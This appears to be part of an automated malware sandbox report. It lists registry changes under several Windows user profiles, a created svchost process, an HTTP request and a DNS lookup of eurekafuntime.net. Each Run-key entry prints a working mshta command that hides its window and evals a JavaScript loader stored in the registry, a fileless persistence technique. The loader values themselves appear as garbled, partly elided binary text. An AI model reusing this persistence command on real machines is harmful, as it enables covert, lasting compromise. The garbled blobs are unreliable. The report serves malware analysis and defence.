    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • eurekafuntime.net